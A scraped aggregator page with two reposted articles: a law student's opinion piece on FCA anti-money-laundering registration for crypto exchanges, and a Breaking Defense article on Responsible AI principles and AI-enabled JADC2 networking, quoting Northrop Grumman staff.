In terms of Anti-Money Laundering (AML) and Know-Your-Customer (KYC) regulation, the UK Financial Conduct Authority (FCA) is the regulator of crypto-asset companies in the UK. Crypto-asset companies have to comply with the Money Laundering, Terrorist Financing and Transfer of Funds Regulations 2017, which includes the requirement of having to be registered with the FCA in order to continue business. The FCA also introduced a Temporary Registration Regime for firms that had applied to be registered before, but whose applications were still being processed. As it turns out, the FCA had to extend the deadline for the Temporary Registration Regime (for existing businesses when the requirement was first announced) to 31 March 2022, due to the unprecedented number of firms which could not meet these requirements () and had to withdraw their applications. Since the need to register with the FCA was introduced in January 2020, only five companies have successfully registered with the regulator. In short, the issue isnt really that of a lack of regulation, but that the sector as a whole has yet to catch up in terms of cyber-security and AML practices.

This seems to suggest therefore that there is a good chance that retail investors and consumers of such crypto-asset exchanges are using products with significant cybersecurity risks. The need to raise regulatory standards therefore seems like a natural answer. On the other hand, it has been argued that stricter regulatory rules only drive criminals towards exchanges in jurisdictions with looser regulatory requirements. However, as pointed out by Michael Philipps (), chief claims officer at cyber insurance group Resilience, these exchanges usually have lower liquidity, which makes the laundering process more difficult. If what we are concerned about is preventing large-scale hacking heists amongst the most widely used exchanges in the UK, then imposing a level of regulation commensurate with the increased level of risk makes sense.

The other libertarian counter-argument would be to argue that investment decisions are personal commercial decisions that inherently involve some level of risk, and that excessively regulating these exchanges would not prevent the ignorant, the gullible, or the fearless from similar decisions that would be equally risky or dangerous. Ones right to plunge ones entire life savings into Bitcoin should be zealously guarded, no matter how crazy such a decision may seem, so the argument goes. However, I think a distinction needs to be made between raising regulatory standards to better inform consumer choice, and banning these exchanges outright. The desire for the UK to grow into a global fintech hub should also be balanced with the consumer risks inherent to these platforms. The priority should not be to discourage the flourishing of fintech businesses and start-ups, but to ensure that any crypto-asset exchange legitimately operating in the UK measures up to a rigorous and sufficient AML/KYC regulatory regime, which would in turn protect consumers.

The reality of course is that while the FCA continually warns retail investors that they risk losing all their money by transacting on these unregulated exchanges, there will always be those who choose to ignore these warnings. But by actively regulating these exchanges and presenting a stark choice between the legitimate and the unregulated, retail traders on unregulated exchanges would have to take stronger ownership of their personal choices, and whatever risks these choices may entail.

Hui Ting Tan is a law graduate and LLM student at the LSE. He is an aspiring commercial solicitor.

Read the original:
How to tackle cyber hacks on crypto exchanges - Legal Cheek

It’s both AI technology and ethics that will enable JADC2 – Breaking Defense

Artificial intelligence graphic courtesy of Northrop Grumman.

Questions that loom large for the wider application of artificial intelligence (AI) in Defense Department operations often center on trust. How does the operator know if the AI is wrong, that it made a mistake, that it didnt behave as intended?

Answers to questions like that come from a technical discipline known as Responsible AI (RAI). Its the subject of a report issued by the Defense Innovation Unit (DIU) in mid-November called Responsible AI Guidelines in Practice, which addresses a requirement in the FY21 National Defense Authorization Act (NDAA) to ensure that the DoD has the ability, requisite resourcing, and sufficient expertise to ensure that any artificial intelligence technologyis ethically and reasonably developed.

DIUs RAI guidelines provide a framework for AI companies, DOD stakeholders and program managers that can help to ensure that AI programs are built with the principles of fairness, accountability, and transparency at each step in the development cycle of an AI system, according to Jared Dunnmon, technical director of the artificial intelligence/machine learning portfolio at DIU.

This framework is designed to achieve four goals, said Dunnmon:

Trust in the AI is foremost

Just like Isaac Asimovs Three Laws of Robotics describes ethical behavior for robots, the DIUs guidelines offer five ethical principles for development and use of artificial intelligence.

Its that fifth principle, governable, that addresses the questions asked at the top about letting the operator know when the AI is wrong. Operators need to establish trust in the AI systems or they simply wont be used. Thats not an option for something as complex as the Joint All Domain Command and Control concept of operations.

Dr. Amanda Muller, Consulting (AI) Systems Engineer and Technical Fellow, who is the Responsible AI Lead for Northrop Grumman.

Governable AI systems allow for graceful termination and human intervention when algorithms do not behave as intended, said Dr. Amanda Muller, Consulting AI Systems Engineer and Technical Fellow, who is the Responsible AI Lead for Northrop Grumman, which is one of the few companies with such a position. At that point, the human operator can either take over or make adjustments to the inputs, to the algorithm, or whatever needs to be done. But the human always maintains the ability to govern that AI algorithm.

Northrop Grummans adoption of these RAI principles builds justified confidence in the AI systems being created because the human can understand and interpret what the AI is doing, determine if its operating correctly through verification and validation, and take actions if it is not.

The importance of doing so is clear for the future of AI in the military. If AI systems do not work as designed or are unpredictable, leaders will not adopt them, operators will not use them, Congress will not fund them, and the American people will not support them, states the Final Report from the National Security Commission on Artificial Intelligence (NSCAI). This commission was a temporary, independent, federal entity created by Congress in the National Defense Authorization Act for Fiscal Year 2019. The commission was led by former Google CEO Eric Schmidt and former Deputy Secretary of Defense Robert Work, and delivered its 756-page Final Report in March 2021, disbanding in October.

The power of AI is its ability to learn and adapt to changing situations, said Muller. The battlefield is a dynamic environment and the side that adapts fastest gains the advantage. Like with all systems, though, AI is vulnerable to attack and failure. To truly harness the power of AI technology, developers must align with the ethical principles adopted by the DoD.

The complexity of all-domain operations will demand AI

The DoDs pledge to develop and implement only Responsible Artificial Intelligence will underpin development of systems for JADC2. An OODA (Observe, Orient, Decide, Act) loop stretching from space to air and ground, and to sea and cyber will only be possible through the ability of an AI system to control the JADC2 infrastructure.

Vern Boyle, Vice President of Advanced Processing Solutions for Northrop Grummans Networked Information Solutions div.

The AI could perceive and reason on the best ways to move information across different platforms, nodes, and decision makers, explained Vern Boyle, Vice President of Advanced Processing Solutions for Northrop Grummans Networked Information Solutions division. And it could optimize the movement of that information and the configuration of the network because itll be very complex.

Well be operating in contested environments where it will be difficult for a human to react and understand how to keep the network and the comm links functioning. The use of AI to control the communication and networking infrastructure is going to be one big application area.

At the same time, RAI will serve as a counterweight to Americas Great Power competitors, China and Russia, who certainly wont engage in ethical AI as they push for power. As part of its strategic plan, China has declared it will be the global leader in AI by 2030 and its investments in dual-use technologies like advanced processing, cyber security, and AI are threats to U.S. technical and cognitive dominance.

The key difference is that China is applying AI technologies broadly throughout the country, said Boyle. They are using AI for surveillance and tracking their citizens, students, and visitors. They use AI to monitor online behaviors, social interactions and biometrics.

China has no concern about privacy rights or ethical application of the data that AI is able to gather and share. All data is collected and used by both industry and the Chinese government to advance their goal of global, technical dominance by 2030.

Fundamental to the U.S response to Chinas actions is assuring that the Defense Departments use of AI reflects democratic values, according to Boyle.

It is critical that we move rapidly to set the global standard for responsible and ethical AI use, and to stay ahead of China and Russias advances toward the lowest common denominator. The U.S., our ally partners, and all democratic-minded nations must work together to lead the development of global standards around AI and talent development.

Northrop Grumman systems to close the connectivity/networking gap

Doing so will help to close one of the most significant capability gaps facing armed forces right now, which is basic connectivity and networking. The platforms and sensors needed to support JADC2satellites, unmanned air and ground systems, and guided missile destroyers, to name a fewarent necessarily able to connect and move information effectively because of legacy communications and networking systems.

That reality will dampen the DoDs ambitions for AI and machine learning for tactical operations.

Its both a gap and a challenge, observed Boyle. Lets assume, though, that everyones connected. Now theres an information problem. Not everybody shares their information. Its not described in a standard way. Having the ability to understand and reason on information presumes that youre able to understand it. Those capabilities arent necessarily mature yet either.

There are also challenges with respect to multi-level security and the ability to share and distribute information at different classification levels. That adds a level of complexity thats not typically present in the commercial sector.

The severity of this issue and the need to solve it in the name of all-domain operations is driving Northrop Grumman to prioritize the successful application of AI to communications and networking.

The company has numerous capabilities deployed now on important platforms such as Global Hawk and is working with customers to leverage gateway systems in service now for data relay, while developing new capabilities to address gaps in communications and networking.

AI graphic courtesy of Northrop Grumman.

Northrop Grummans portfolio already contains enabling technologies needed to connect joint forces, including advanced networking, AI/ML, space, command and control systems, autonomous systems powered by collaborative autonomy, and advanced resiliency features needed to protect against emerging threats. And it is developing AI that acts as the connective tissue for military platforms, sensors, and systems to communicate with one anotherenabling them to pass information and data using secure, open systems, similar to how we use the Internet and 5G in our day-to-day lives.

The DoD has stated that it must have an AI-enabled force by 2025 because speed will be the differentiator in future battles, said Boyle That means speed to understand the battle space; speed to determine the best course of action to take in a very complex and dynamic battle space; and speed to be able to take appropriate actions. Together, they will let the DoD more quickly execute the OODA Loop (Observe, Orient, Decide, Act).

AI and advanced, specialized processing at the tactical edge will provide a strategic information advantage. AI and edge computing are the core enabling technologies for JADC2.

See more here:
It's both AI technology and ethics that will enable JADC2 - Breaking Defense